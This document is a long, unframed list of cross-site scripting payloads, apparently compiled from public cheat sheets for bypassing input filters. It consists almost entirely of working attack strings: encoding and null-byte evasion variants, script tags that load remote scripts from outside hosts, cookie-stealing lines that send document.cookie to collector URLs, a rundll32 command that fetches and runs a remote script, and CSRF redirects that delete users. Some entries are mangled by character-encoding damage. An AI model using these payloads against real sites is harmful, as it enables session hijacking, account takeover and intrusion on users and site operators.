- p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
- p=<svg 1=’&q=onload=’/*&r=*/alert(1)’>
- p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>
- p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
- *&p=<svg/onload=eval(0+location.search)>&*/1:alert(document.domain)
- *&p=<svg/onload=eval%280%2Blocation.search%29>&*/1:alert%28document.domain%29
- “‘`><p><svg><script>a=’hello\x27;javascript:alert(1)//’;</script></p>
- <p>This is a secret text.</p>
- pune<script>alert(document.cookie)</script>
- =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
- p=’/wp-admin/plugin-editor.php?’
- <?PXML><html:script>alert(29)</html:script>
- <PXML><html:script>alert(30)</html:script>
- ?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>
- ?q=%ED%A0%80\”))}catch(e){alert(1)}//
- q=e=>{return e};q.constructor(String.raw(q`a${0}e${0}t${0}1337)`,’l’,’r’,’(‘))();
- <Q%^&*(�G@!���� style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- <q/oncut=alert()>
- <q/oncut=alert(1)>
- <q/oncut=confirm()
- <q/oncut=open>
- <q/oncut=open()>
- ‘/><q/oncut=open()>//
- Qp4LnNlbmQoJCk=
- \";alert('XSS');//
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- >"><script>confirm('hi')</script>"<</a>value=””><script>confirm(‘hi’)</script>”<”/>
- RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
- React.createElement
- {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (‘’+’’.toString(‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’)));}}
- <rect fill=”white” style=”clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);”/>
- <rect width=��1000�� height=��1000�� fill=��white��/></a></svg>
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Reflect.set(location, ‘href’, ‘javascript:alert(1)’)
- .replace(/.+/,eval)//
- res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
- **/ression(alert(/1/))”>1</div>
- Result => javas + cript: + ale + rt + ( + 1 + )
- Result => javas + cript: + ale + rt + (1)
- Result => javascript:alert(1)
- Result => javascript: + /*click me! + #*/alert(1)
- Result => javascript: +’click me! + #’-alert(1)
- Result => javas + script: + ale + rt + (1)
- Results for <?php echo $_GET[‘q’];?>”:
- return bindingFunction(bindingContext,node);
- return new Function(“$context”,”$element”, functionBody);
- “‘<>\r\n\ being escaped
- ) = )
- (_+`rt(let)`)``
- rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;o=GetObject(“script:http://goo.gl/jApjhr “);o.Exec();close();
- <s “‘“=”” 000=””>
- “‘“><s/000 “‘“><s/000
- <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
- <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
- <S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
- <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
- s1=0?’1':’i’; s2=0?’1':’fr’; s3=0?’1':’ame’; i1=s1+s2+s3; s1=0?’1':’jav’; s2=0?’1':’ascr’; s3=0?’1':’ipt’; s4=0?’1':’:’; s5=0?’1':’ale’; s6=0?’1':’rt’; s7=0?’1':’(1)’; i2=s1+s2+s3+s4+s5+s6+s7;
- s1=0?’’:’i’;s2=0?’’:’fr’;s3=0?’’:’ame’;i1=s1+s2+s3;s1=0?’’:’jav’;s2=0?’’:’ascr’;s3=0?’’:’ipt’;s4=0?’’:’:’;s5=0?’’:’ale’;s6=0?’’:’rt’;s7=0?’’:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
- s1=’java’||’’+’’;s2=’scri’||’’+’’;s3=’pt’||’’+’’;
- s1=[‘java’||’’+’’]; s2=[‘scri’||’’+’’]; s3=[‘pt’||’’+’’];
- s1=[‘java’+’’+’’+’scr’+’ipt’+’:’+’aler’+’t’+’(1)’];
- s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’; u1=s1+s2+s3;URL=u1
- s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’;u1=s1+s2+s3;URL=u1
- s1=!’’&&’jav’;s2=!’’&&’ascript’;s3=!’’&&’:’;s4=!’’&&’aler’;s5=!’’&&’t’;s6=!’’&&’(1)’;s7=s1+s2+s3+s4+s5+s6;URL=s7;
- s1=<s>evalalerta(1)a</s>,s2=<s></s>+’’,s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
- ><s”%2b”cript>alert(document.cookie)</s”%2B”cript>
- ><s%2bcript>alert(document.cookie)</script>
- “><s”%2b”cript>alert(document.cookie)</script>
- ��><s��%2b��cript>alert(document.cookie)</script>
- ><s%2bcript>alert(/Xss-By-Muhaddi/)</script>
- ><s%2bcript>alert(/Xss/)</script>
- ��><s��%2b��cript>alert(/Xss/)</script>
- <! — sample vector → <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
- <ScaleLoadingMov>1</ScaleLoadingMov>
- <sc#ipt> continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- <sc#ipt>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- <sc#ipt>if(top!=self)top.location=location</script>
- <SCR%00IPT>alert(“XSS”)</SCRIPT>
- <SCR%00IPT>confirm(document.location)</SCR%00IPT>
- <scr%00ipt>prompt(1)</sc%00ript>
- <scr%00ript>confirm(0);</scr%00ipt>
- <scr\0ipt>prompt(1)</sc\0ript>
- <<scr\0ipt/src=http://xss.com/xss.js></script
- <<scr\0ipt/src=http://xss.cx/xss.js></script
- “><script>alert('xss')</script>
- <scr<! — esi →ipt>aler<! — esi →t(1)</sc<! — esi →ript>
- <scri%00ipt>confirm(0);</script>
- <scri%00pt>alert(1);</scri%00pt>
- <Scri% 00pt> alert (1); </ scri% 00pt>
- <scri%00pt>confirm(0);</scri%00pt>
- ><scri%00pt>confirm(0);</scri%00pt>
- “<scri%00pt>confirm(0);</scri%00pt>”
- “\”><scri%00pt>confirm(0);</scri%00pt>”,
- <scri%00pt>confirm(1);</scri%00pt>
- </script>
- <script>/*
- <script>
- “<! — <script>”
- “<! — script>”
- “><script>”
- */</script>
- <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
- <script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
- <script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0��//(%000000%0dalert(1)
- <script/%00%00v%00%00>alert(/renwax23/)</script>
- <script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0a3//(%000000%0dconfirm(1)//
- <script>({0:#0=alert/#0#/#0#(0)})</script>
- <script>({0:#0=alert/#0#/#0#(123)})</script>
- <script%00>alert(1)</script%00>
- <script>({0:#0=confirm/#0#/#0#(0)})</script>
- <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
- <script%0a%0dConfirm(1);</script>
- <script>//>%0Aalert(1);</script>
- </script%0A-_-><script>confirm(1)</script%0A-_->
- <script%0Caaaaa>alert(123)</script>
- <script>(0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();</script>
- <script%0Daaa>alert(1)</script%0Daaaa>
- <script>++1-+?(1)</script>
- <script>+-+-1-+-+alert(1)</script>
- <script>/<1/>alert(document.domain)</script></svg>
- <script>$=1,alert($)</script>
- <script>$=1,alert($)</script>//INJECTX
- “<script>1-confirm(0);</script>”/>
- <script>+-+-1-+-+confirm(1)</script>
- “/><script>+-+-1-+-+confirm(1)</script>
- <script>1</script>
- <script>$=1,\u0061lert($)</script>
- >”><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
- <ScRiPt%20>prompt(document.domain)</ScRiPt>
- <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001">
- <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
- <script%20src=”//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
- <script%20TEST>alert(1)</script%20TESTTEST>
- <ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
- <ScRipT 5–0*3?=>prompt(1)</ScRipT giveanswerhere=?
- <script>’a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
- <script>a=’abc\*chr*\’;log(*num*)//def’;</script>
- <;SCRIPT a=”;blah”; ‘;’; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT a=”blah” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>a=document.cookie
- <script>a=eval;b=alert;a(b(/ 1/.source));</script>’”>
- <script>a=eval;b=alert;a(b(/i/.source));</script>
- <SCRIPT “a=’>’” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=`>` id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=”>” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <script>a=`jackmasa<! — <script/\`;</script>
- <script ~~~>alert(0%0)</script ~~~>
- `><script>alert(0)</script>
- <<script>alert(0)</script>
- ‘’;! — “<script>alert(0);</script>=&{()}
- “><script>alert(0)</script>
- ‘’;! — “<script>alert(0);</script>=&{(alert(1))}
- </script>”-alert(0)-”><svg onload=’;alert(178);’>
- \”><script>alert(0x000123)</script>
- \”><sCriPt>alert(0x000123)</sCriPt>
- <script>alert(1)//
- <script>alert(1)//
- “><script>alert(1)<! —
- “><script>alert(1)//
- *//><script>/*alert(1)//
- *//”><script>/*alert(1)//
- <script>alert(1)%0d%0a →%09</script
- <script>alert(1234)</script>
- /<script>alert(1234)</script>
- <ScripT>alert(1234)</ScRipT>
- /<script>alert(1234)</script>##0
- <script>alert(123)</script>
- ><script>alert(123)</script>
- →<script>alert(123)</script>
- ‘><script>alert(123)</script>
- “><script>alert(123)</script>
- scriptalert(123)/script
- &<script>alert(123)</script>=123
- ><script>alert(123);</script x=
- ‘><script>alert(123);</script x=’
- “><script>alert(123);</script x=”
- <script>alert(129)//
- <script>alert(130)<!�V
- <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
- “><script>alert(1337)</script>”><script>alert(“XSS by \nxss</h1></marquee>
- */</script>’>alert(157)/*<script/157=’
- <script>alert(159)</script>
- <script>alert(‘1’)</alert>
- <script>alert(1);&b=bar
- <script>alert(1);/*&b=*/</script>
- <script>({[alert(1)](){}});({get[alert(2)](){}});({set[alert(3)](a){}});</script>
- <script>alert(1)<! — INJECTX
- <script>alert(1)//INJECTX
- <script>alert(1)</script>'><button>CLICK
- <%<! — ‘%><script>alert(1);</script →
- <script<{alert(1)}/></script </>
- <script>/* */alert(1)/* */</script>
- <script>/&/-alert(1)</script>
- <script>”=>” * alert(1)</script>
- <script>({‘ \ ‘(){alert(1)}})[` \ `]()</script>
- <script>alert`1`</script>
- <script>alert(1)</script>
- <script>alert(1)</script>
- <script>alert(1)</script
- <script>alert(1);</script>
- <script /**/>/**/alert(1)/**/</script /**/
- ???script?alert(1)?/script?
- <scRipt>alErt(1)</scrIpt>
- <scRiPt>alert(1);</scrIPt>
- <sCrIpt>alert(1)</script>
- <sCrIpt>alert(1)</ScRipt>
- <sCRiPt>alert(1);</sCRipT>
- <Script>alert(1)</Script>
- <ScRiPt>alert(1)</sCriPt>
- <<SCRIPT>alert(1);//<</SCRIPT>
- */</script>’>alert(1)/*<script/1=’
- &”><script>alert(1)</script>=1
- “><script>alert(1)</script>=1”onPaste=”eval(‘;)\’SSX\’(trela’.split(‘’).reverse().join(‘’))”
- <script>-=alert;-(1)</script> “onmouseover=”confirm(document.domain);”” </script>
- <script>alert(1);</script> <script>prompt(1);</script> <script>confirm (1);</script> <script src=”http://rhainfosec.com/evil.js">
- <script>alert(1)<!�V
- <script>alert(1)<!V
- <script>alert`1`;var something = `abc${alert(1)}def`;``.constructor.constructor`alert\`1\````;</script>
- <script/&>alert(25)</script>
- <script>alert(2)</script> “><img src=x onerror=prompt(document.domain)>
- <script>alert(2)//!#ERROR?&^%$#</script>
- <script>alert(/3/)</script>
- ‘> <script>alert(3)</script>
- > <script>alert(4)</script>
- `> <script>alert(5)</script>
- <script>/&/-alert(7)</script>
- <script>alert(/7/.source)</script>
- <script>+alert(88199)</script>
- <script>alert(/88199/)</script>
- <script>alert(88199)</script>
- <script>alert(/88199/.source)</script>
- “><script>alert(9)</script><a”
- <script>alert(9)</script<br>
- ]]><script>alert(9)</script><![CDATA[
- <script>alert(document.cookie)</script>”>
- <script>alert(document.cookie)</script>
- =’><script>alert(document.cookie)</script>
- ><<script>alert(document.cookie);//<</script>
- ‘><script>alert(document.cookie)</script>
- ‘><script>alert(document.cookie);</script>
- “><<script>alert(document.cookie);//<</script>
- “><script>alert(document.cookie)</script>/><’:
- “><script>alert(document.cookie)</script>
- “/><script>alert(document.cookie);</script>
- ��><<script>alert(document.cookie);//<</script>
- ><ScRiPt>alert(document.cookie)</script>
- ��><ScRiPt>alert(document.cookie)</script>
- “>’><SCRIPT>alert(document.cookie)</SCRIPT>
- <script>alert(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>alert(document.domain)</script>
- <script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>alert(document.head.childNodes[3].text)</script>
- <script>alert(document.head.innerHTML.substr(146,20));</script>
- “><script>alert(document.location)</script><”
- ?script?alert(�FXSS�F)?/script?
- ?script?alert(FXSSF)?/script?
- <script>alert(“hellox worldss”);</script>
- <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
- <ScRipt>ALeRt(“hi”);</sCRipT>
- <script>alert(navigator.userAgent)<script>
- <script>alert(String.fromCharCode(49,49))</script>
- <script>alert(String.fromCharCode(49))</script>
- <script ^__^>alert(String.fromCharCode(49))</script ^__^
- “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
- <script>alert(String.fromCharCode(88,83,83))</script>
- “><script>alert(String.fromCharCode(88,83,83))</script>
- “><script alert(String.fromCharCode(88,83,83))</script>
- “><script alert(String.fromCharCode(88,83,83))</script>
- <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
- <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
- “><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=”
- \’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=\’
- <SCRIPT>alert(String.fromCharCode(88))</SCRIPT>
- “><script>alert(‘test’)</script>
- <<SCRIPT>alert(“test”);//<</SCRIPT>
- <<script>alert(“WXSS”);//<</script>
- <script>alert(“WXSS”)</script>
- ><ScRiPt>alert(Xss-By-Muhaddi)</sCrIpT>
- <<SCRIPT>alert(Xss-By-Muhaddi);//<</SCRIPT>
- <script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
- “><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- ><ScRiPt>alert(xss by shawar)</sCrIpT>
- >/”><script>alert(‘xss message’)</script>
- ‘<script>alert(‘xss message’)</script>
- “><script>alert(‘xss message’)</script>
- =’><script>alert(“xss”)</script>
- →<script>alert(xss);<script>
- ! — “ /><script>alert(‘xss’);</script>
- <script>alert(��Xss��)</script>
- <script>alert(Xss)</script>
- ><script>alert(/Xss/)</script>
- ><script>alert(Xss)</script>
- ��><script>alert(/Xss/)</script>
- ��><script>alert(��Xss��)</script>
- <! — — →<script>alert(‘XSS’);</script><! — — →
- <script>alert(‘XSS’)</script>
- <script>alert(‘XSS’);</script>
- <script>alert(&XSS&)</script>
- >”><script>alert(“XSS”)</script>&
- ‘“><script>alert(‘XSS’)</script>
- ‘“>><script>alert(‘XSS’)</script>
- ‘“>><script>alert(‘XSS’)</script>
- “><script>alert(‘XSS’)</script>
- “><script>alert(��XSS��);</script>
- “><script>alert(XSS);</script>
- &<script>alert(‘XSS’);</script>”>
- <ScRipt>ALeRt(XSS);</sCRipT>
- ><ScRiPt>alert(Xss)</sCrIpT>
- ��><ScRiPt>alert(��Xss��)</sCrIpT>
- <<SCRIPT>alert(��Xss��);//<</SCRIPT>
- <<SCRIPT>alert(Xss);//<</SCRIPT>
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- <<SCRIPT>alert(XSS);//<</SCRIPT>
- <;<;SCRIPT>;alert(“;XSS”;);//<;<;/SCRIPT>;
- <;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;
- <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
- <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
- <SCRIPT> alert(��XSS��); </SCRIPT>
- <SCRIPT> alert(XSS); </SCRIPT>
- <SCRIPT>alert(‘XSS’)</SCRIPT>
- <SCRIPT>alert(‘XSS’);</SCRIPT>
- <script>alert(‘xss’);</script>
- <script>alert(“xss”);</script>
- ‘/*<script>alert(“xss”)</script>*/%2B’
- <script>alert(“XSS”);</script>&search=1
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <script>alert(yXSSz)</script>.
- <script>alert(yXSSz)</script>
- <script>/&/-alert(1)</script>
- <script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script>
- <script’ + Array(999999).join(‘/’) + ‘>alert(1)<\/script>
- <script>Array.from`1${alert}3${window}2`</script>
- <script>Array.from([1],alert)</script>
- <script>Array.from`${eval}alert\`1\``</script>
- <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” “ SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <;SCRIPT “;a=’;>;’;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=`>;` SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=”;>;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=”;>’;>”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT+a=”>’>” SRC=”http://localhost"></SCRIPT>
- <script “a=’>’” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=`>` SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>’>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>” ‘’ SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <SCRIPT “a=’>’” SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT “a=’>’” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
- <;SCRIPT>;a=/XSS/
- <SCRIPT>a=/XSS/
- <SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>
- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
- <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
- “‘`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
- <SCRIPT>a=/XSS/nalert(‘XSS’);</SCRIPT>
- <script>a=/XSS/\ndocument.vulnerable=true;</script>
- <script>/*//&b=*/alert(1);</script>
- <SCRIPT <B>=alert(‘XSS’);”></SCRIPT>
- ?”></script><base%20c%3D=href%3Dhttps:\mysite>
- <script>’bbbalert(1)cccc’.replace(/a\w{4}\(\d\)/,eval)</script>
- <script <B>document.vulnerable=true;</script>
- <;SCRIPT =”;blah”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT =”blah” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script charset=”\x22>javascript:alert(1)</script>
- <script>/* **chr*/log(*num*)// */</script>
- ‘“`><script>/* **chr*log(*num*)// */</script>
- “`’><script>*chr*log(*num*)</script>
- <script>```${``[class extends[alert``]{}]}```</script>
- <script>[class extends[alert````]{}]</script>
- <script ~~~>confirm(0%0)</script ~~~>
- <script>’confirm(0)%3B<%2Fscript>
- ><script>’confirm(0)%3B<%2Fscript>
- “<script>’confirm(0)%3B<%2Fscript>”
- “\”><script>’confirm(0)%3B<%2Fscript>”,
- <script>confirm(0);</script>
- ><script>confirm(0)</script>
- “<script>confirm(0);</script>”
- “><”script”>”confirm(0)”</”script”>
- “\”><script>confirm(0)</script>”,
- <%<! — ‘%><script>confirm(1);</script →
- <sc’+’ript>confirm(1)</script>
- <script>/* */confirm(1)/* */</script>
- <script>confirm (1);</script>
- <script>confirm(1)</script>
- <script ~~~>confirm(1)</script ~~~>
- >”<>”<script>confirm(1)</script>
- “‘><script>confirm(1)</script>”,
- [<script>]=*confirm(1)</script>
- <script Confirm(1);</script>
- “/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
- “\”/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>”
- >”<>”<script>confirm(2)</script>
- <script>confirm(88199)</script>
- <script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
- <script>confirm(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>confirm(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>confirm(document.head.childNodes[3].text)</script>
- <script>confirm(document.head.innerHTML.substr(146,20));</script>
- >”><script>confirm(document.location)</script>&
- <SCRIPT>confirm(document.location);</SCRIPT>
- <script>confirm(“"no”)</script>
- <script ^__^>confirm(String.fromCharCode(49))</script ^__^
- <script>confirm(String.fromCharCode(88,83,83));</script>
- ><script>confirm(String.fromCharCode(88,83,83));</script>
- “<script>confirm(String.fromCharCode(88,83,83));</script>”
- “\”><script>confirm(String.fromCharCode(88,83,83));</script>”,
- <script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450’)/***/</script /***/
- <script>/*confirm(“Woops”);*/</script>
- <script>confirm(x.y[0])</script>
- <script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
- <script>``.constructor.constructor`confirm\`1\````</script>
- <script>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- “><script>co\u006efir\u006d`1`</script>
- “><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
- <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>
- <script>debugger;</script>
- <script defer>alert(1)</script>
- -<script/defer>alert(1)</script>
- <script>delete[a=alert]/prompt a(1)</script>
- <SCriPt>delete alert;alert(1)</sCriPt>
- <script>delete[a=this[atob(‘YWxlcnQ=’)]]/prompt a(1)</script>
- <script>delete /* code to execute */throw~delete~typeof~/* code to execute */delete[a=/* function */]/delete a(/* params */)var a = (new function(/* code to execute */))();</script>
- <script>d.innerHTML+=’’;</script>
- <script>`</div><div>`==alert(123)</script>
- <script>`</div><div>`-alert(123)</script>
- <script>`</div><div>`/=alert(123)</script>
- <script>`</div><div>`/alert(123)</script>
- <script>`</div><div>`*=alert(123)</script>
- <script>`</div><div>`%alert(123)</script>
- <script>`</div><div>`+alert(123)</script>
- //’/<@/></script></div></script> →<select */onclick=alert()><o>1<o>2')//”<! —
- <script>document.body.innerHTML=”<h1>XSS-Here</h1>”</script>
- <script>document.forms[0].submit(); </script>
- <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
- <script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
- <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
- <script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- “><script>document.location=’http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
- “><script>document.location=’http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
- <<script>document.vulnerable=true;</script>
- <! — — →<script>document.vulnerable=true;</script><! — — →
- <![<! — ]]<script>document.vulnerable=true;// →</script>
- <script>document.vulnerable=true;</script>
- &<script>document.vulnerable=true;</script>
- <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
- <script>document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);</script>
- <script>document[‘write’](88199);</script>
- <script>document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);</script>
- <script>document.write(Array(184).join(‘<marquee>’))</script>
- <script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
- <script>document.write(“<img/**/src=’1'/**/onerror=’alert(1)’/>”);</script>
- <SCRIPT>Document.write(‘<img src=\’http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>’);</SCRIPT>
- <script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
- “/><script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
- <script> document.write(‘<math><! — ‘); </script> <i name=” →<head><script>//”>alert(1)<! — </script> →
- <script>document.write(‘<math><! — ‘);</script><i name=” →<head><script>//”>alert(1)<! — </script> →
- <SCRIPT>document.write(“<SCRI”)
- <script>document.write(‘<script>/*’);</script>*/alert(1)</script>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js"></SCRIPT>
- <;SCRIPT>;document.write(“;<;SCRI”;);<;/SCRIPT>;PT SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://www.securitycompass.com/xss.js"></script>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT>
- <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
